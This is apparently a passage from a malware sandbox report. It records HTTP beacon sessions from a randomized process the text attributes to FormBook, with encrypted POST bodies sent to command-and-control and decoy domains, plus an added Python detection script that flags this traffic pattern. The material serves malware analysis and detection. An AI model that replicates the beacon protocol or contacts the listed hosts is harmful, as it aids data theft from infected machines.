                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 2b 34 52 41 31 4e 75 6a 41 49 41 55 34 37 4d 4b 61 50 79 41 34 73 4f 48 78 76 67 66 66 44 6b 46 61 6a 38 2f 68 47 70 73 66 5a 63 69 68 6d 31 56 6a 32 55 62 2b 51 79 6e 49 4e 2f 6f 77 2b 5a 74 75 67 69 2f 53 4a 34 53 5a 6e 2b 4c 34 48 6e 2b 6f 72 72 6a 4c 61 79 78 6a 68 4d 73 58 59 6a 5a 65 4e 56 68 35 76 42 42 74 61 74 44 50 37 69 71 37 67 4f 2b 42 47 30 63 74 4d 57 68 6d 4d 51 79 62 50 65 65 35 63 52 76 6c 51 52 69 36 76 32 72 6e 71 50 65 71 70 42 72 4f 64 31 67 4f 6f 46 59 36 42 53 51 42 79 4e 36 6c 75 52 51 39 2f 6c 70 4c 55 49 50 49 32 36 4f 43 4f 6f 53 4d 2f 37 33 31 77 6f 45 4e 38 59 38 5a 52 45 4b 46 56 50 4f 68 68 61 38 50 67 2b 7a 74 49 3d
                                Data Ascii: 76=YrIbg6ogMNMcY+4RA1NujAIAU47MKaPyA4sOHxvgffDkFaj8/hGpsfZcihm1Vj2Ub+QynIN/ow+Ztugi/SJ4SZn+L4Hn+orrjLayxjhMsXYjZeNVh5vBBtatDP7iq7gO+BG0ctMWhmMQybPee5cRvlQRi6v2rnqPeqpBrOd1gOoFY6BSQByN6luRQ9/lpLUIPI26OCOoSM/731woEN8Y8ZREKFVPOhha8Pg+ztI=
                                Timestamp: Sep 23, 2024 14:38:55.444797993 CEST  Bytes transferred: 402  Direction: IN
                                Data: HTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:55 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session ID: 31  Source IP: 192.168.2.7  Source Port: 49735  Destination IP: 142.250.186.51  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:57.032861948 CEST  Bytes transferred: 1773  Direction: OUT
                                Data: POST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 2b 34 52 41 31 4e 75 6a 41 49 41 55 34 37 4d 4b 61 50 79 41 34 73 4f 48 78 76 67 66 66 4c 6b 46 70 62 38 2f 41 47 70 74 66 5a 63 71 42 6d 30 56 6a 33 55 62 34 34 32 6e 49 51 45 6f 7a 47 5a 75 49 55 69 72 33 6c 34 63 5a 6e 2b 58 49 48 6d 6a 59 72 36 6a 4c 4b 32 78 6a 78 4d 73 58 59 6a 5a 59 70 56 6a 6f 76 42 48 74 61 73 45 50 37 32 38 37 68 6e 2b 42 65 6b 63 74 41 47 68 56 55 51 79 37 2f 65 63 72 6b 52 6e 6c 51 54 78 4b 75 77 72 6e 75 75 65 71 6c 6e 72 4e 42 50 67 4d 6f 46 64 75 45 72 45 7a 2b 52 6f 45 57 5a 62 62 36 41 69 61 45 44 48 66 61 5a 52 77 71 4c 4f 37 6a 4e 79 32 70 67 43 36 49 62 70 72 64 74 4b 6d 46 72 4f 48 41 6c 37 2f 38 46 74 6f 5a 4e 6c 57 37 64 50 34 6a 54 32 50 32 59 4e 6a 51 77 76 74 6d 31 33 2b 6b 55 38 67 79 54 67 64 38 6a 75 4d 4c 48 57 77 4c 79 63 46 62 4b 6b 42 58 4d 6f 72 72 54 43 71 51 44 6a 52 66 64 41 4c 4b 45 42 64 79 47 55 65 6d 6f 50 53 45 30 30 74 7a 47 69 78 50 6b 4b 55 37 59 78 79 6e 73 6c 48 36 37 4d 30 45 61 4c 53 4e [TRUNCATED]
                                Data Ascii: 76=YrIbg6ogMNMcY+4RA1NujAIAU47MKaPyA4sOHxvgffLkFpb8/AGptfZcqBm0Vj3Ub442nIQEozGZuIUir3l4cZn+XIHmjYr6jLK2xjxMsXYjZYpVjovBHtasEP7287hn+BekctAGhVUQy7/ecrkRnlQTxKuwrnuueqlnrNBPgMoFduErEz+RoEWZbb6AiaEDHfaZRwqLO7jNy2pgC6IbprdtKmFrOHAl7/8FtoZNlW7dP4jT2P2YNjQwvtm13+kU8gyTgd8juMLHWwLycFbKkBXMorrTCqQDjRfdALKEBdyGUemoPSE00tzGixPkKU7YxynslH67M0EaLSNMafIucr4GpPRQE1Ktz98Pbndgwh9eti40BrKeI9ebNq23nYHU1H1A5kuOvd9tfmP7HBwUP5rL7dAywnCtd+EvppQJkAe5i5ID85yB0K3c125MVJ5Q+rmFrDchCI2czP1yNnzMmeCM5j9G7YD7Htj8XIubj8IsfpBGea/L7a2v+LI4mn+kBm0+RJ/k7Bl0zmKcY/I6QaqLbQmJko8dC9Qv/lVuf3WqgYj5dU+jOfmtl63Tb7tXinhMe13zaFWpLVORYGpRs9TiuYXTfWH5a4VqatyqqNHPOkyjDD1cf+lWadUzxb5QJnEAvp4ehV+OhpoZQQNmjbwqJ/0NCwlDF+aSozhn/g5Dslj5xzpfsNawlXB+H0hl1wHiOgiqUQWWSYmYRLf+UEWlybiBetCs3+gcZl9uWb23R+xtE2qirEb0edLsHzpwFoAx+ymck6JykJ2Nd23D4q4VW4UuEPLPBFgPOeRGCLclmBdrr3NHMJQpyjopbnOUJIHAo0FYvnsUHSD5W4yHm69OK8kROa1mdQ/M3rc9B9diCKvcOBDFqc0Me6yhxMdEJ28MVbOEdjEzaA2QUd4PYDM6bGtNZGdiM8zuCeZZ22AYPEulGHs8XosM+Hz5ed6NszzHxEy7IBzuTIt4b4TGw2Jh2+ZXySa4Hl7w7l8u70zGlMKjM [TRUNCATED]
                                Timestamp: Sep 23, 2024 14:38:57.758460999 CEST  Bytes transferred: 402  Direction: IN
                                Data: HTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:57 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session ID: 32  Source IP: 192.168.2.7  Source Port: 49736  Destination IP: 142.250.186.51  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:59.632251978 CEST  Bytes transferred: 477  Direction: OUT
                                Data: GET /i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Timestamp: Sep 23, 2024 14:39:00.363027096 CEST  Bytes transferred: 560  Direction: IN
                                Data: HTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:39:00 GMT
                                Location: https://www.deefbank.net/i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


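Sessions 21 to 32 above show the same four-step cycle run against each host in turn: three POSTs to a short random path with bodies of 215, 235 and 1247 bytes, each a single form field "76=" followed by opaque data, then a GET carrying the same "76" key plus an "mtJD_" parameter, every request with a Chrome 17 User-Agent and, on the POSTs, an Origin and Referer naming the contacted host itself. The only responses recorded so far come from hosts that do not speak the protocol (a 404 with rate-limit headers from www.sppsuperplast.online, 301 redirects to HTTPS from www.deefbank.net), which fits FormBook's known habit of cycling through decoy domains alongside its real C2. The Python below is an added detection example; it is not part of the Joe Sandbox report and not FormBook's code. It parses raw request text, tags the indicators just listed, and reports hosts that received the POST, POST, POST, GET cycle; it also decodes a "Data Raw" hex column back to bytes so a report's "Data Ascii" line can be checked rather than trusted. The sample requests are constructed from the sessions above with placeholder bodies (the real ones are encrypted blobs), www.example.com is a placeholder benign host, and the indicator names and the min_posts threshold are this example's own choices.

```python
"""FormBook-style HTTP beacon detection (added example, not the report's or FormBook's code).
Sample requests are constructed to mirror sessions 21-24 above; bodies are placeholders."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# User-Agent in every request above: a 2012-era Chrome 17 build no current browser sends.
STALE_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 "
            "(KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11")
# Every POST body above is one short numeric key followed by base64-looking data.
SINGLE_KEY_BODY = re.compile(r"^(\d{1,3})=([A-Za-z0-9+/]+={0,2})$")


def decode_data_raw(hex_dump: str) -> bytes:
    """Turn a report's 'Data Raw' column ('37 36 3d ...') back into bytes so the
    'Data Ascii' line can be verified rather than trusted."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def parse_request(raw: str) -> dict:
    """Split raw HTTP/1.x request text into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def request_indicators(req: dict) -> list:
    """Per-request indicators, each taken from what the sessions above show."""
    hits, h = [], req["headers"]
    host = h.get("host", "")
    if h.get("user-agent") == STALE_UA:
        hits.append("stale-chrome-ua")
    # Origin and Referer name the contacted host itself, imitating a form post
    # from a page that was never loaded.
    if host and h.get("origin") == f"http://{host}" and h.get("referer", "").startswith(f"http://{host}/"):
        hits.append("self-referer")
    if req["method"] == "POST":
        m = SINGLE_KEY_BODY.match(req["body"])
        if m:
            hits.append("single-key-b64-body:" + m.group(1))
    elif req["method"] == "GET":
        keys = [k for k, _ in parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True)]
        # One numeric key carrying data plus one short key ending in "_" (mtJD_ above).
        if any(k.isdigit() for k in keys) and any(k.endswith("_") for k in keys):
            hits.append("keyed-get-beacon")
    return hits


def beacon_hosts(requests: list, min_posts: int = 3) -> dict:
    """Map host -> body lengths of its keyed POSTs, for hosts that got at least
    min_posts keyed POSTs plus a keyed GET (the POST, POST, POST, GET cycle above)."""
    per_host = defaultdict(list)
    for req in requests:
        per_host[req["headers"].get("host", "")].append((req, request_indicators(req)))
    found = {}
    for host, tagged in per_host.items():
        posts = [r for r, ind in tagged if any(i.startswith("single-key-") for i in ind)]
        if len(posts) >= min_posts and any("keyed-get-beacon" in ind for _, ind in tagged):
            found[host] = [len(r["body"]) for r in posts]
    return found


def _request(method: str, host: str, path: str, body: str = "") -> str:
    """Constructed raw request text in the shape of the sessions above."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", f"User-Agent: {STALE_UA}",
             "Connection: close"]
    if method == "POST":
        lines += [f"Origin: http://{host}", "Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}", f"Referer: http://{host}{path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def _body(total_len: int) -> str:
    """Placeholder for the encrypted '76=' payload, padded to the sizes seen above."""
    return "76=" + "A" * (total_len - 3)


C2_HOST = "www.solisbysobha.net"  # host of sessions 21-24 above
SAMPLE = [parse_request(r) for r in [
    _request("POST", C2_HOST, "/s5b1/", _body(215)),
    _request("POST", C2_HOST, "/s5b1/", _body(235)),
    _request("POST", C2_HOST, "/s5b1/", _body(1247)),
    _request("GET", C2_HOST, "/s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXq"),
    # Constructed benign request for contrast; www.example.com is a placeholder.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/130.0\r\n\r\n",
]]

if __name__ == "__main__":
    for req in SAMPLE:
        print(req["method"], req["headers"]["host"], request_indicators(req))
    print("beaconing hosts:", beacon_hosts(SAMPLE))  # {'www.solisbysobha.net': [215, 235, 1247]}
```

On a real proxy or IDS log, feed each raw request to parse_request and rely on beacon_hosts rather than on the User-Agent alone: the stale Chrome string is a good pivot but also turns up in old scanners and test tools, while the per-host POST, POST, POST, GET cycle with a single-key body is the shape specific to this traffic. Hosts that answer with redirects, 404s or parking pages, as two of the four hosts above do, should still be recorded as contacted, since the sample treats them no differently from the live C2.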
                                Session ID: 33  Source IP: 192.168.2.7  Source Port: 49737  Destination IP: 199.59.243.227  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:13.543255091 CEST  Bytes transferred: 767  Direction: OUT
                                Data: POST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 71 36 72 48 35 31 56 79 42 44 56 58 46 76 39 6b 71 77 4c 30 47 2b 65 4f 64 6b 55 45 37 2f 70 51 52 65 58 76 39 51 32 35 50 31 4a 67 6a 68 34 5a 41 35 57 34 61 53 36 4c 64 53 7a 49 73 50 32 65 34 65 4a 74 4e 6b 51 52 75 4a 2b 69 39 55 76 69 56 72 42 7a 4c 75 74 34 63 49 56 69 4c 4b 76 34 54 32 6f 77 62 5a 45 42 32 57 4c 4d 73 67 64 32 6c 53 76 4b 64 30 48 6d 47 43 6f 74 61 59 33 68 33 50 67 38 53 78 73 72 4d 75 39 50 70 55 46 50 79 6c 50 48 41 39 76 32 46 44 64 59 61 48 4f 4e 65 78 33 72 74 62 4b 4f 7a 6f 34 58 6d 68 67 48 76 70 6c 4d 69 52 77 43 4f 68 35 46 35 6f 30 70 6b 64 79 63 76 70 36 4a 4f 75 7a 59 61 7a 53 72 47 51 3d 3d
                                Data Ascii: 76=q6rH51VyBDVXFv9kqwL0G+eOdkUE7/pQReXv9Q25P1Jgjh4ZA5W4aS6LdSzIsP2e4eJtNkQRuJ+i9UviVrBzLut4cIViLKv4T2owbZEB2WLMsgd2lSvKd0HmGCotaY3h3Pg8SxsrMu9PpUFPylPHA9v2FDdYaHONex3rtbKOzo4XmhgHvplMiRwCOh5F5o0pkdycvp6JOuzYazSrGQ==
                                Timestamp: Sep 23, 2024 14:39:14.931289911 CEST  Bytes transferred: 1236  Direction: IN
                                Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 54 43 44 2f 4e 49 35 54 47 4f 50 64 45 6e 51 75 6b 49 44 68 35 42 50 2f 54 6e 64 73 2f 49 44 4a 56 4d 52 58 45 6e 5a 38 58 2f 31 6d 38 2f 66 38 41 4f 55 6b 56 35 52 5a 43 44 39 70 61 6a 74 53 51 42 59 76 55 31 78 64 30 76 4f 33 7a 37 52 56 73 4b 79 33 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Timestamp: Sep 23, 2024 14:39:14.931310892 CEST | Bytes transferred: 603 | Direction: IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWY3NDU2OTYtZDBjZC00NjE2LTllYTAtMTI0M2FiZjg0ZmZjIiwicGFnZV90aW1lIjoxNzI3MDk1MT
                                Timestamp: Sep 23, 2024 14:39:14.931551933 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Timestamp: Sep 23, 2024 14:39:14.931922913 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: af745696-d0cd-4616-9ea0-1243abf84ffc
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=af745696-d0cd-4616-9ea0-1243abf84ffc; expires=Mon, 23 Sep 2024 12:54:13 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                Session ID: 34 | Source IP: 192.168.2.7 | Source Port: 49738 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 3040 | Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:16.081939936 CEST | Bytes transferred: 787 | Direction: OUT | Data: POST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=q6rH51VyBDVXHPNkoTT0DeePREUEiPpqRZfv9RipMH9gjEEZObu4dS6LPyzRiv3c4eFPNmERuJai9UfiWYZyL+t+E4VgUav4T2owbZBc2WTMszF2qQHLe0H5RyotX42o3PgOSwwBMtFPpWNPy0ORO9vwaTcTcErkYULyr6y1zvkBu39l1Lpg8AI5KjdzuOpcmc2EiLOoRZWyXhzvQvnSxvIgmWajV/+nlvkSZss=
                                Timestamp: Sep 23, 2024 14:39:16.524482012 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:16 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
                                x-request-id: fc0da03a-ca55-43a0-ab06-64aca8ff0363
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=fc0da03a-ca55-43a0-ab06-64aca8ff0363; expires=Mon, 23 Sep 2024 12:54:16 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Timestamp: Sep 23, 2024 14:39:16.524501085 CEST | Bytes transferred: 603 | Direction: IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmMwZGEwM2EtY2E1NS00M2EwLWFiMDYtNjRhY2E4ZmYwMzYzIiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session ID: 35 | Source IP: 192.168.2.7 | Source Port: 49739 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 3040 | Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:18.629132032 CEST | Bytes transferred: 1800 | Direction: OUT | Data: POST /8dtf/ HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.donante-de-ovulos.biz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.donante-de-ovulos.biz/8dtf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76= [TRUNCATED]
                                Timestamp: Sep 23, 2024 14:39:19.083872080 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:18 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1150
